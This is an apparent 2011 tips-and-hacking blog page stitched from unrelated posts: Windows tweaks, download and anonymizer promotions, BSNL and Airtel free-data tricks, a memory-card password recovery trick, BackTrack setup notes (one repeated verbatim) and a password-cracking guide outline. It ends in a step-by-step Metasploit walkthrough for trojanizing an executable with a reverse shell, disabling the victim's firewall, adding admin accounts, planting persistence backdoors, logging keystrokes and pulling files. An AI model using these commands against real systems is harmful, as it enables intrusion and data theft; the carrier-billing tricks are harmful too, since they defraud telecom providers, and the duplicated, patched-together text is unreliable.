Monday, March 14, 2011

A modern PC with Vista Home Edition takes about one and a half minutes to boot. An older machine with XP is about the same. That’s 30 seconds for the PC itself (the BIOS) to boot up, plus a minute for the Windows operating system to boot.

Sometimes, you need to reboot Windows (e.g. when installing new software), but there is no need to restart BIOS, too. However, the default is to reboot both. (That’s called doing a “cold boot,” rather than a “warm boot.”) There’s a trick that works on both XP and Vista to get it to do a warm boot instead, thus saving you 30 seconds per cycle.

The trick is to hold down the SHIFT key when invoking the restart.

Windows Vista: Select Start, then hover over the right arrow that is to the right of the padlock icon until the pop-up menu appears that contains “restart” as one of it’s choices. Hold down the SHIFT key while clicking on the “restart” choice.

Windows XP: Select Start. Select “Shut Down…”. Change the drop-down combo box under “What do you want the computer to do?” to “Restart”. Hold down the SHIFT key while clicking on the “OK” button.


Have you ever felt bugged-up with the Start-up and Shutdown jingle of your Windows XP or Vista ? If yes, here is the solution, now you use any of your favorite voice or music or dialogue as your PC’s shutdown and start up.

It’s a simple 4 step process.

1.Choose the track which you want to play at start-up and shutdown jingles,

2.Now rename these files as “Windows XP Startup.WAV” and “Windows XP Shutdown.WAV” respectively.

3.Now Go to “C:\WINDOWS\MEDIA”, here you will find files “Windows XP Startup.WAV” and “Windows XP Shutdown.WAV”, move them to some other locations, this step is required for, in case you need to revert back these sounds, else you can ignore this step.

4.Now the files you have chosen and renamed, just copy-paste or cut paste them in “C:\WINDOWS\MEDIA”, here you go, now you can enjoy the new Start-up and shutdown.

Limitations are

* It should be in .WAV format.
* The size of file should not be large, prefer keeping them within in 1 Mb, otherwise your startup will take a bit longer.

If the file you want to make your start-up or shutdown is not in .WAV format, you can easily convert them using Jet Audio 7, or any other converter.

If you’ve ever waited too long for your files to download from a slow connection, or been cut off mid-way through a download, or just can’t keep track of your ever-growing downloads, FlashGet can help you.FlashGet is specifically designed to address two of the biggest problems when downloading files, speed and management of downloaded files.
Download FlashGet here


FlashGet is specifically designed to address two of the biggest problems when downloading files, speed and management of downloaded files.

Features


- Optimize the system resource. FlashGet can use up the lowest system resources and will not influence your normal work or study.

- Call anti-virus automatically. FlashGet can call anti-virus automatically to clean viruses, spyware and adware after finishing download.

- 100% Clean, free. No adware and spyware. Easy to install and use.

- Increase the download speed and stability. Flashget can increase download speed from 6-10 times. It uses MHT (Multi-server Hyper-threading Transportation) technique and optimization arithmetic.

- Support HTTP, FTP, BT and other various protocols. FlashGet supports HTTP, FTP, BT, MMS, RTSP and other protocols. It is seamless between protocols and there is no need to operate manually for download switch. The One Touch technique optimizes BT download and can automatically download target files after getting seeds information, hence no need to operate again.

- Powerful files management feature. It supports unlimited categories. Each category is assigned a download saving directory. The powerful management feature can support drag and drop, adding and description, search, rename, etc.

Image Surfing on the net is not as secure as the average internet user may think. Your identity and what you are doing can be monitored easily. This is especially true for those with Wireless networks, those who browse the internet from their work computer and those that browse dodgy (red flag) websites. The solution is to use an anonymizer when you surf the net.
Anonymous Surfing redirects your web traffic through secure servers, hiding your online identity. Identity thieves, aggressive marketers, hackers and online snoops are prevented from accessing your personal information and viewing your Internet activity.

The Anonymizer (includes a Free Tool to browse any website anonymously)

Surf Secret

Proxy 7

Virtual Browser

Hide IP

Site Tunnel

Surf Anonymous

From reading some of the information on these sites, you may be shocked to realize how little privacy you actually have….even with a Firewall. If you have concerns with identity theft or monitoring of your online browsing without your permission , I suggest you take a look at these sites and decide for yourself.

Security is becoming more and more important as new viruses and worms (Lovesan Worm, Blaster Worm...etc) keep being unleashed. That's why it's important to make sure your system is protected.Put your system to the test. Here are some great websites that will test your security:


Hackerwhacker.com

GRC

Testmyfirewall

Auditmypc

  • An Excellent software to recover data for your Sim card,

    Sim Card Data Recovery Software recovers your mobile phone sim card accidentally deleted text SMS messages. Data Doctor Sim Card Recovery Software is read only and non-destructive utility restore all lost message. Utility retrieve all deleted contact numbers (phone numbers), unreadable messages, corrupt phone book directory.

    It provides full backup of your cell phone's erased sim memory. For recovery, you need a phoenix type USB sim card reader or PC/SC Standards based sim card Reader and a PC having Microsoft windows operating system. Sim card reader scans simcard deeply and detects all the recoverable information. Print option provides the facility to print report of all recovered data like your text message and contact numbers. This software provides full details about sim card like its provider and ICC –ID (identification number). It provides restoration of lost or corrupted text files due to virus infection
    in your mobile phone. Recovery is not possible if sim card is locked (due to unauthorized PIN code). Software ensures recovery even if your inbox, outbox, draft and sent items messages and phone numbers are invisible or unreadable. It fetches recently erased call list.


    Important:Please remember that you need USB SIM Card reader (any PC/SC Standards or Phoenix Standards based Reader) to use our software to recover data from sim card. If you are not able to find any compatible SIM card reader, Please feel free to contact us to get the information of manufacturers, who can make it available to you in very short time.

    Download Link http://www.4shared.com/file/74852469/945dd17/SIMCardDataRecoverySoftwarev3015.html

  • Today I am going to show how to hack BSNL 3G hack and browse unlimited internet at high speed up to 120 Kbps. I am not sure whether this hacking is still working or not, members from other forums are posting that this hack is working fine for them.




  • Before you start learning how to hack you need to have BSNL 2G SIM and ultimately 3G support mobile phone.

    Just follow up the instruction:
    1. Recharge your 2G SIM with Rs 1 to convert it to 3G SIM and use them for free hours
    2. Check the balance by dialing *123#, the message will show that your GPRS free usage is ZERO MB
    3. Now recharge again with Rs 1 to convert in to 2G SIM
    4. Now recharge with Rs 274 for unlimited GPRS usage for 2G SIM 
    5. Now again recharge with Rs 1 to convert in to 3G SIM 
    6. Thats it You have hacked your BSNL 3G for unlimited browsing check the GPRS free usage by dialing *123# it will show 1250000 MB free usage.

    Hope it will work for you! Try it and share you thought with us!



  • I really don't know whether this trick is working or not, but I found in some forums that members are posting that this trick is still working fine! IF you want to browse internet for free of cost using Airtel Live. All you need to have a free mobile browser Opera 4.2 or 5 Beta 2 and some GPRS setting in Airtel Live

    IF your Airtel Live is not active, call the customer care and receive Airtel Live setting and configure according to their guidance.

    Now download the following Opera mobile browser and install it in to your mobile.

    Now you have have activated your Airtel Live and opera mini browner.

    Now change the follow the instruction to configure your Airtel Live setting to surf freely

    For s60 users:

    Create a new access point and set
    Access Point as airtelgprs.com
    Proxy address= 80.239.242.253
    Port= 80 (Remember its 80 not 8080)

    Just try it on your mobile and share your feeback with us.

  • We usually set password for our memory card for privacy and security, but the common mistake every one does at least once in out life time forgetting password. If you set password for mobile memory card, then you should be not forget the password. If you does then the only option is to formate your memory card with the help of the card reader and eventually the loss of all your data stored on it. There is a way to break the security wall. If you are a Symbian device lover then no need to worry about the password. You can crack them in few minutes.



    In this tutorial I am going to teach you how to reset your memory card password in easy step. Before we start you need to have X-plore (application used to explore your system files and folder even the hidden folders in your device)



    Step1: Install X-Plore in your mobile. If you want to download X-Plore search around internet you can download free trail.

    Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"

    Step3: Once you done that now go to the following path C:/Sys/Data/Mmcstore

    Step4: Once you reached there you need to press "3" under option to set it in the Hex-viewer

    Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6). Just check the character between the "?" it is your password ie: 62626



    Note: If you have not set the password, then you will not able to gain access to C:/Sys/Data
    THE OFFICIAL SOCIAL ENGINEERING BOOK We would like to congratulate Social-Engineer.Org for their official release of the book, Social Engineering : The Art of Human Hacking. The book has proven to be a huge success and being marked by the community as the official social engineering book.

    We are excited to see Social-Engineer.org lead the way in evloving social engineering’s reputation from the world of scammers and thugs to a science that can be utilized to help improve information security for all of us.

    We strongly encourage everyone to increase their awareness of malicious social engineering and the dangers it provides, and this book and the official social engineering framework are the perfect vehicles to start.


    This method of installation is the simplest available. The assumption is that the whole hard drive is going to be used for BackTrack.
    1. Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface.
    2. Double click the “install.sh” script on the desktop, or run the command “ubiquity” in console.
    3. Select your geographical location and click “forward”.  Same for the Keyboard layout.
    4. The next screen allows you to configure the partitioning layout. The assumption is that we are deleting the whole drive and installing BackTrack on it.
    5. Accept the installation summary and client “Install”. Allow the installation to run and complete. Restart when done.
    6. Log into BackTrack with the default username and password root / toor. Change root password.
    7. Fix the framebuffer splash by typing “fix-splash” ( or “fix-splash800″ if you wish a 800×600 framebuffer), reboot


    The goal is to unify all of the good information found in various bits and pieces into 1 large document. This document is for people who want to learn to the how and why of password cracking. There is a lot of information being presented and you should READ IT ALL BEFORE you attempted doing anything documented here. I do my best to provide step by step instructions along with the reasons for doing it this way. Other times I will point to a particular website where you find the information. In those cases someone else has done what I attempting and did a good or great job and I didn’t want to steal their hard work. These instructions have several excerpts from a combination of posts from pureh@te, granger53, irongeek, PrairieFire, and stasik. I would also like to thank each of them and others for the help they have provided me on the BackTrack forum.

    I had to compress the document so I could attach it. The document as it stands now is 127K. Please let me know if what I have is wrong, or if there is a better way to do something, or if I am missing something. I am planning on making enhancements as people make me aware of them.

    Here is the table of contents
    Code:
    1 LM vs. NTLM
    2 Syskey
    3 Cracking Windows Passwords
       3.1 Extracting the hashes from the Windows SAM
          3.1.1 Using BackTrack Tools
             3.1.1.1 Using bkhive and samdump v1.1.1 (BT2 and BT3)
             3.1.1.2 Using samdump2 v2.0.1 (BT4)
             3.1.1.3 Cached Credentials
          3.1.2 Using Windows Tools
             3.1.2.1 Using fgdump
             3.1.2.2 Using gsecdump
             3.1.2.3 Using pwdump7
             3.1.2.4 Cached Credentials
       3.2 Extracting the hashes from the Windows SAM remotely
          3.2.1 Using BackTrack Tools
             3.2.1.1 ettercap
          3.2.2 Using Windows Tools
             3.2.2.1 Using fgdump
       3.3 Cracking Windows Passwords
          3.3.1 Using BackTrack Tools
             3.3.1.1 John the Ripper BT3 and BT4
                3.3.1.1.1 Cracking the LM hash
                3.3.1.1.2 Cracking the NTLM hash
                3.3.1.1.3 Cracking the NTLM using the cracked LM hash
                3.3.1.1.4 Cracking cached credentials
             3.3.1.2 John the Ripper - current
                3.3.1.2.1 Get and Compile
                3.3.1.2.2 Cracking the LM hash
                3.3.1.2.3 Cracking the LM hash using known letter(s) in known location(s) (knownforce)
                3.3.1.2.4 Cracking the NTLM hash
                3.3.1.2.5 Cracking the NTLM hash using the cracked LM hash (dumbforce)
                3.3.1.2.6 Cracking cached credentials
             3.3.1.3 Using MDCrack
                3.3.1.3.1 Cracking the LM hash
                3.3.1.3.2 Cracking the NTLM hash
                3.3.1.3.3 Cracking the NTLM hash using the cracked LM hash
             3.3.1.4 Using Ophcrack
                3.3.1.4.1 Cracking the LM hash
                3.3.1.4.2 Cracking the NTLM hash
                3.3.1.4.3 Cracking the NTLM hash using the cracked LM hash
          3.3.2 Using Windows Tools
             3.3.2.1 John the Ripper
                3.3.2.1.1 Cracking the LM hash
                3.3.2.1.2 Cracking the NTLM hash
                3.3.2.1.3 Cracking the NTLM hash using the cracked LM hash
                3.3.2.1.4 Cracking cached credentials
             3.3.2.2 Using MDCrack
                3.3.2.2.1 Cracking the LM hash
                3.3.2.2.2 Cracking the NTLM hash
                3.3.2.2.3 Cracking the NTLM hash using the cracked LM hash
             3.3.2.3 Using Ophcrack
                3.3.2.3.1 Cracking the LM hash
                3.3.2.3.2 Cracking the NTLM hash
                3.3.2.3.3 Cracking the NTLM hash using the cracked LM hash
             3.3.2.4 Using Cain and Abel
          3.3.3 Using a Live CD
             3.3.3.1 Ophcrack
    4. Changing Windows Passwords
       4.1 Changing Local User Passwords
          4.1.1 Using BackTrack Tools
             4.1.1.1 chntpw
          4.1.2 Using a Live CD
             4.1.2.1 chntpw
             4.1.2.2 System Rescue CD
       4.2 Changing Active Directory Passwords
    5 plain-text.info
    6 Cracking Novell NetWare Passwords
    7 Cracking Linux/Unix Passwords
    8 Cracking networking equipment passwords
       8.1 Using BackTrack tools
          8.1.1 Using Hydra
          8.1.2 Using Xhydra
          8.1.3 Using Medusa
          8.1.4 Using John the Ripper to crack a Cisco hash
       8.2 Using Windows tools
          8.2.1 Using Brutus
    9 Cracking Applications
       9.1 Cracking Oracle 11g (sha1)
       9.2 Cracking Oracle passwords over the wire
       9.3 Cracking Office passwords
       9.4 Cracking tar passwords
       9.5 Cracking zip passwords
       9.6 Cracking pdf passwords
    10 Wordlists aka Dictionary attack
       10.1 Using John the Ripper to generate a wordlist
       10.2 Configuring John the Ripper to use a wordlist
       10.3 Using crunch to generate a wordlist
       10.4 Generate a wordlist from a textfile or website
       10.5 Using premade wordlists
       10.6 Other wordlist generators
       10.7 Manipulating your wordlist
    11 Rainbow Tables
       11.1 What are they?
       11.2 Generating your own
          11.2.1 rcrack - obsolete but works
          11.2.2 rcracki
          11.2.3 rcracki - boinc client
          11.2.4 Generating a rainbow table
       11.3 WEP cracking
       11.4 WPA-PSK
          11.4.1 airolib
          11.4.2 pyrit
    12 Distributed Password cracking
       12.1 john
       12.2 medussa (not a typo this is not medusa)
    13 using a GPU
       13.1 cuda - nvidia
       13.2 stream - ati
    Thanks,

    P.S. Thank you everyone for your feedback. Keep it coming.

    Changes from version 0.1
    * Added a section on plain-text.info
    * Added a section on using john the ripper with a custom character list
    * Added Xploitz’s and pureh@te’s wordlists

    Changes from version 0.2 - 200 downloads
    * Added sections on using ophcrack
    * Added sections on Cain and Able under windows
    * Fixed a typo
    * New html format

    Changes from version 0.3 - 410 downloads
    * Moved some content to where it should have been
    * Added a section on crunch
    * Fixed typos
    * Fixed a whole lot of html issues
    * Slightly rearranged things to flow better

    Changes from version 0.4 - 877 downloads
    * Added a section on cached credentials
    * Expanded the Novell section
    * Fixed typos
    * Fixed a couple of html errors
    * Moved some things around
    * New utility to dump passwords

    Changes from version 0.5 - 1573 downloads
    * added wpa pw-inspector command
    * added a wordlist manipulation section
    * added usage of fgdump
    * added rcracki section
    * added a sample hash.txt to play with
    * john can be used for input to aircrack-ng
    * moved a few things around for a better flow

    Changes from version 0.6 - 422 downloads
    * added a section on generating a wordlist from a website
    * added head, tail, and sed commands to wordlist manipulation
    * added a section on xhdrya (pointing to Pureh@te's video)
    * added a section on gsecdump
    * added a section on medusa
    * added a section on cisco
    * expanded the crunch section
    * moved everything around in an effort to make things easier to find
    * the dumbforce and knownforce are not finished

    Changes from version 0.7 - 4596 downloads
    * Fixed john --incremental=All --stdout | aircrack-ng -b 00:11:22:33:44:55 -w --test.cap
    missing a - Thanks to roblad for pointing it out

    Changes from version 0.8 - 302 + 1226 (old forums + new)
    * updated the guide to support BT4-Pre-Final
    * switched from transitional html to strict html
    * added a section on cracking office passwords
    * added a section on cracking rar passwords
    * added a section on cracking zip passwords
    * added a section on cracking pdf passwords
    * added instructions for remote password dumping for fgdump
    * point users to john the ripper wiki for dumbforce and knownforce usage
    * convert text urls to links
    * updated links
    * update versions of software (wine and rcrack)
    * fixed several spelling mistakes

    Changes from version 0.9

    * updated the guide to support BT4 Final
    * fixed links to pureh@te's videos
    * added instructions to update flash so you can watch videos clearly
    * updated the john the ripper section to current versions
    * added instructions for using rainbow tables for WPA cracking
    * added two new leetifing scripts
    * added a small cupp discussion
    * added a section on pyrit
    * added a section on distributed password cracking using john and medussa
    * added a section on cuda and stream
    * fixed typo in hash.txt


    MOD EDIT: Download link for the guide:
    http://tools.question-defense.com/Cr...ords_Guide.pdf


    This is always a huge topic and it seems simple to many of us but the fact of the matter is we have a lot of "new" people so we need to be clear about this sort of thing. (Note all commands should be run as root or with sudo)

    1. To start networking in Backtrack 4 final issue the following command.

    /etc/init.d/networking start

    This will attempt to start all the interfaces in the /etc/network/interfaces file.

    root@bt:~# cat /etc/network/interfaces
    auto lo
    iface lo inet loopback

    auto eth0
    iface eth0 inet dhcp

    auto eth1
    iface eth1 inet dhcp

    auto eth2
    iface eth2 inet dhcp

    auto ath0
    iface ath0 inet dhcp

    auto wlan0
    iface wlan0 inet dhcp

    If you don't have or don't want some of these interfaces then simply remove the from this file and they will not start.

    If you need to set a static IP just set the variables in the /etc/network/interfaces file

    auto eth0
    iface eth0 inet static
    address 192.168.0.100
    netmask 255.255.255.0
    network 192.168.0.0
    broadcast 192.168.0.255
    gateway 192.168.0.1

    You will also need to make sure you set a nameserver in /etc/resolv.conf

    root@bt:~# cat /etc/resolv.conf
    nameserver 192.168.0.1

    So for example if all you have is eth0 and wlan0 on your system and you want them both to get a adress via DHCP then remove every thing else for the file with the exception of the lo interface. Here is a example.

    root@bt:~# cat /etc/network/interfaces
    auto lo
    iface lo inet loopback

    auto eth0
    iface eth0 inet dhcp

    auto wlan0
    iface wlan0 inet dhcp

    Now if are lazy and want all this to start at boot you can simply issue this command as root

    update-rc.d networking defaults

    This will create all the proper sym-links

    What about ssh?

    So while I am on the subject I may as well go over ssh. In order to use ssh on backtrack 4 final you need to generate the keys first.

    sshd-generate

    after that you can start ssh like this:

    /etc/init.d/ssh start

    or you can add it to the boot sequence like this:

    update-rc.d ssh defaults

    Well thats enough to get up and running. I hope this was somewhat helpful to any one just getting started with backtrack.


    This is always a huge topic and it seems simple to many of us but the fact of the matter is we have a lot of "new" people so we need to be clear about this sort of thing. (Note all commands should be run as root or with sudo)

    1. To start networking in Backtrack 4 final issue the following command.

    /etc/init.d/networking start

    This will attempt to start all the interfaces in the /etc/network/interfaces file.

    root@bt:~# cat /etc/network/interfaces
    auto lo
    iface lo inet loopback

    auto eth0
    iface eth0 inet dhcp

    auto eth1
    iface eth1 inet dhcp

    auto eth2
    iface eth2 inet dhcp

    auto ath0
    iface ath0 inet dhcp

    auto wlan0
    iface wlan0 inet dhcp

    If you don't have or don't want some of these interfaces then simply remove the from this file and they will not start.

    If you need to set a static IP just set the variables in the /etc/network/interfaces file

    auto eth0
    iface eth0 inet static
    address 192.168.0.100
    netmask 255.255.255.0
    network 192.168.0.0
    broadcast 192.168.0.255
    gateway 192.168.0.1

    You will also need to make sure you set a nameserver in /etc/resolv.conf

    root@bt:~# cat /etc/resolv.conf
    nameserver 192.168.0.1

    So for example if all you have is eth0 and wlan0 on your system and you want them both to get a adress via DHCP then remove every thing else for the file with the exception of the lo interface. Here is a example.

    root@bt:~# cat /etc/network/interfaces
    auto lo
    iface lo inet loopback

    auto eth0
    iface eth0 inet dhcp

    auto wlan0
    iface wlan0 inet dhcp

    Now if are lazy and want all this to start at boot you can simply issue this command as root

    update-rc.d networking defaults

    This will create all the proper sym-links

    What about ssh?

    So while I am on the subject I may as well go over ssh. In order to use ssh on backtrack 4 final you need to generate the keys first.

    sshd-generate

    after that you can start ssh like this:

    /etc/init.d/ssh start

    or you can add it to the boot sequence like this:

    update-rc.d ssh defaults

    Well thats enough to get up and running. I hope this was somewhat helpful to any one just getting started with backtrack.


    Pentest on BT4 R1

    GUIDE EXPLANATION:
    Text in {} = Titles
    # In front of text = Info
    Text in [] = Your Input

    # Here are some examples on [] from the guide beneath:

    # set LHOST [IP ADRESS INT.] = set LHOST 192.168.1.15

    # rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"

    # search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg

    # So when you input anything where there is [], remember to remove the []

    -------------------------------------

    {Shell 1} (Creating Exploit)

    Code:
    cd /pentest/exploits/framework3/
    
    svn up
    # To update framework3
    
    clear
    
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - How many time it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
    # If you get encoder error find another EXE or try to encode it less time

    # Copy payload to target


    -------------------------------------

    {Shell 2} (Using Exploit)

    Code:
    cd /pentest/exploits/framework3/
    
    clear
    
    ./msfconsole
    
    use exploit/multi/handler
    
    set PAYLOAD windows/meterpreter/reverse_tcp
    
    set LHOST [IP ADRESS INT.]
    
    set LPORT [PORT] (if used in msfpayload in Shell 1)
    
    show options
    
    exploit
    ----------
    # Now we wait for connection, so start the payload on victim computer
    ----------

    Code:
    use priv
    
    ps
    # Look for PID on explorer.exe
    
    migrate [PID on explorer]
    
    getsystem
    
    sysinfo
    # If "Arch = x64" = NO HASHDUMP it won't work
    # Now we are in the system

    -------------------------------------

    {Prepare for RDP}

    Code:
    shell
    # Connect to CMD
    
    reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    # Allows incoming terminal service connections
    
    reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    # Disables blocking incoming Terminal service connections
    
    Netsh firewall set opmode enable
    # Enable Firewall on Victim
    
    Netsh firewall set opmode disable
    # Disable Firewall on Victim
    {USER:} (Still in shell)

    Code:
    net user [USERNAME] [PASSWORD] 
    # Change password for the user
    
    # Or create you own user
    
    net user [USERNAME] [PASSWORD] /add
    
    net localgroup [GROUP] [USERNAME] /add 
    # In [GROUP] you could use "administrators" and [USERNAME] is the user you just created
    
    net accounts /maxpwage:[days] | unlimited
    # Examples: net accounts /maxpwage:6
    # or: net accounts /maxpwage:unlimited
    # CTRL + Z then Y to exit shell without it freezing the system

    -------------------------------------

    {Shell 3} (RDP to compromised system)

    # No need for ":" and [PORT] if local

    # Remember to be in "root@bt:~#"
    Code:
    rdesktop [IP]:[port] -u "[USERNAME]"
    -------------------------------------

    {Setting up backdoors for future use} (when in meterpreter console)

    Code:
    run metsvc (set backdoor for next time you want in)
    
    (OR THIS)
    
    run persistence -r [YOUR IP ADRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300
    # 300 tells it to send request for connection every 300 sec. "run persistence -h" for more info

    ***UP- AND DOWNSIDES USING THIS***

    METSVC:
    VERY BAD: All 3 files is use gets flagged by Norton Internet Security 2011 as trojan, maybe other AV's will do this too!
    BAD: If ip change you have to know the IP to connect back to Victim
    GOOD: Easy to use
    GOOD: It dosn't request YOUR IP and port!

    PERSISTENCE:
    BAD: It requests YOUR IP and port!
    BAD: Can be more "difficult" to use
    GOOD: Flexible
    GOOD: Auto Connect
    ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It's only when you run NPE (Norton Power Eraser) it is detected as bad, and will be removed. and that's a tool you must download!

    -------------------------------------

    {GET BACK INTO SYSTEM} (using metsvc in a new terminal)

    Code:
    cd /pentest/exploits/framework3/
    
    svn up
    
    clear
    
    ./msfconsole
    
    use exploit/multi/handler
    
    set PAYLOAD windows/metsvc_bind_tcp
    
    set LPORT 31337 (Must be this port of what i know)
    
    set RHOST [VICTIM IP ADRESS]
    
    show options (see if your setup is correct)
    
    exploit
    ------------------------------------

    {GET BACK INTO SYSTEM} (using persistence in a new terminal)

    Code:
    cd /pentest/exploits/framework3/
    
    svn up
    
    clear
    
    ./msfconsole
    
    use exploit/multi/handler
    
    set PAYLOAD windows/meterpreter/reverse_tcp
    
    set LHOST [IP ADRESS INT.]
    
    set LPORT [PORT]
    # The port set in persistence backdoor
    
    show options
    
    exploit
    ----------
    # Now we wait for connection, it will reconnect to your computer within 300 sec
    ----------

    getuid
    # If = "NT AUTHORITY\SYSTEM" do this else go to "use priv":

    ps
    # Find PID on explorer.exe

    steal_token [NUMBER - PID on explorer]
    # From what i know it grants you the same rights as the user running that process


    use priv

    get system


    ------------------------------------

    {Search} (in meterpreter console)

    Code:
    search -f *.jpg
    # Finding all JPG files on the system
    
    search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg
    # Finding all JPG filen i a specific folder
    
    searct -f test.txt
    # Find a specific file on the whole system
    ------------------------------------

    {Uploading and Downloading} (How I use it)

    # Use "ls", "pwd" and "cd" to navigate around - see below under commands

    Explanation:
    Create a txt file on yout BT4 desktop and write any thing in it, or nothing, and save it with the name "test.txt" then in terminal in meterpreter console (after your connected to victim), navigate to the desktop of the user currently logged in.
    Use "pwd" without quotes, to check if the path is correct, if it is type the following:


    {Upload}

    Code:
    upload /root/test.txt test.txt
    
    # and if you are uploading a file with space in it's name:
    
    upload "/root/test 2.txt" "test 2.txt"
    # Or if your not in the path where you want to upload a file, and want it to be uploaded to another folder

    upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
    # Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"


    {Download}

    Explanation:
    Now we are going to download the file we just uploaded the "test.txt". Navigate to the folder if your not already in it, by using the "cd", "pwd" and "ls" commands.

    Then type:


    Code:
    download test.txt /root/test.txt
    
    # And if you are downloading a file with space in it's name
    
    download "test 2.txt" "/root/test 2.txt"
    
    # Or if your not in the path where you want to download a file from, but know the exact path and name by using search
    
    download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
    # Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"
    ------------------------------------

    {Commands} (meterpreter console)


    help
    # USE THIS!!! thats mostly how i got this knowledge and then googled the commands to get more info on them

    screenshot
    # No need to say what it does - remember you must have used "use priv" in meterpreter first

    cd [DRIVE:\\FOLDER\\FOLDER]
    # You get it - Change directory

    pwd
    # Show what directory your in

    ls
    # List Current Directory

    upload

    # See above

    download

    # See above

    search
    # See above and Meterpreter Search This can be used in diff. consoles!

    keyscan_start
    # Key Sniffer - Start

    keyscan_dump
    # Key Sniffer - dump keys while running

    keyscan_stop
    # Key Sniffer - Stop

    ------------------------------------

    Few words from me:

    First i will say, USE THIS AT YOUR OWN RISK! Do not blame me for anything. DO NOT misuse this information, only use this in a test setup!

    And i will point out for other beginners, i started on using metasploit 2 days ago so do your self a favour and put some heart into it, do your legwork before asking, i just gave you a complete detailed guide from start to finish, on a silver platter.

    As always, if you have any questions, google it first and then google it some more, and THEN ask for directions, not the solution!

    Please give some feedback